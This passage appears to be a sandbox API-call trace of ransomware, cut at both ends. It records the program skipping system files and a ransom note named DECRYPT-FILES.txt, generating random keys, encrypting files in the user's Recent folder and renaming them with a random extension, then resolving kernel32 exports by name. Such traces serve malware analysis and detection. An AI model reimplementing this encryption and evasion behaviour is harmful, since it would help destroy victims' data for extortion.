lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.178] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.178] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.178] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.185] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms") returned 128 [0080.185] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.MauxC1C") returned 136 [0080.185] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.MauxC1C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms.mauxc1c"), dwFlags=0x0) returned 1 [0080.189] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.189] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.189] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.189] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85096390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x96ec4eb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x96ec4eb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x17d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="5d696d521de238c3.customDestinations-ms", cAlternateFileName="5D696D~1.CUS")) returned 1 [0080.192] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms", lpString2="DECRYPT-FILES.txt") returned -1 [0080.193] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms", lpString2="autorun.inf") returned -1 [0080.193] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms", lpString2="boot.ini") returned -1 [0080.193] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms", lpString2="desktop.ini") returned -1 [0080.193] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms", lpString2="ntuser.dat") returned -1 [0080.193] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms", lpString2="iconcache.db") returned -1 [0080.193] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms", lpString2="bootsect.bak") returned -1 [0080.193] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms", lpString2="ntuser.dat.log") returned -1 [0080.193] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms", lpString2="thumbs.db") returned -1 [0080.193] lstrcmpiW (lpString1="5d696d521de238c3.customDestinations-ms", lpString2="Bootfont.bin") returned -1 [0080.193] lstrlenW (lpString="5d696d521de238c3.customDestinations-ms") returned 38 [0080.193] lstrcmpiW (lpString1="customDestinations-ms", lpString2="lnk") returned -1 [0080.193] lstrcmpiW (lpString1="customDestinations-ms", lpString2="exe") returned -1 [0080.193] lstrcmpiW (lpString1="customDestinations-ms", lpString2="sys") returned -1 [0080.193] lstrcmpiW (lpString1="customDestinations-ms", lpString2="dll") returned -1 [0080.193] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0080.193] lstrlenW (lpString="5d696d521de238c3.customDestinations-ms") returned 38 [0080.193] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0080.193] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="5d696d521de238c3.customDestinations-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms" [0080.193] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.200] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.202] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=6100) returned 1 [0080.202] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.202] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.206] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.206] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.209] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.211] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.214] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.215] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.215] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.215] CloseHandle (hObject=0x464) returned 1 [0080.215] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.215] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0080.216] CloseHandle (hObject=0x0) returned 0 [0080.216] CloseHandle (hObject=0x460) returned 1 [0080.217] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.217] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.217] GetTickCount () returned 0x114c8ac [0080.217] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.218] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.218] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.218] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.218] lstrlenA (lpString="kernel32.dll") returned 12 [0080.218] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.218] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.218] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.218] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.218] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.218] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.219] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.219] lstrlenA (lpString="ADDATOMA") returned 8 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.219] lstrlenA (lpString="ADDATOMW") returned 8 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.219] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.219] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.219] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.219] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.219] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.219] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.219] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.219] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.219] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.219] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.219] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.219] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.219] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.219] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.219] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.219] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.219] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.220] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.220] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.220] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.220] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.220] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.220] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.220] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.220] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.220] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.220] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.220] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.220] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.220] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.220] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.220] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.220] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.220] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.220] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.220] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.221] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.221] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.221] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.221] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.221] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.221] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.221] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.221] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.221] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.221] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.221] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.221] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.221] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.221] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.221] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.221] lstrlenA (lpString="BEEP") returned 4 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.221] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.221] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.221] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.221] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.222] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.222] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.222] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.222] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.222] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.222] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.222] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.222] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.222] lstrlenA (lpString="CANCELIO") returned 8 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.222] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.222] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.222] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.222] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.222] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.222] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.222] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.222] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.222] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.222] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.222] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.223] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.223] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.223] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.223] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: 